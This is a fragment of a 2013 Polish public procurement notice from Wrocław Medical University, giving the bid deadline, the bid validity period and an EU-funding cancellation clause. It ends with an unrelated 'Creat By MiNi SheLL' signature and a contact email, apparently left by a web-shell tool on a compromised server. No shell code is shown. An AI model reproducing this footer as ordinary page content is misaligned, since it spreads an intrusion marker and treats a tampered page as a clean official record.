<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2013 godzina 09:00, miejsce: Zespół ds. Zamówień Publicznych Uniwersytetu Medycznego we Wrocławiu ul. Mikulicza - Radeckiego 5; 50-345 Wrocław, Pokój 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com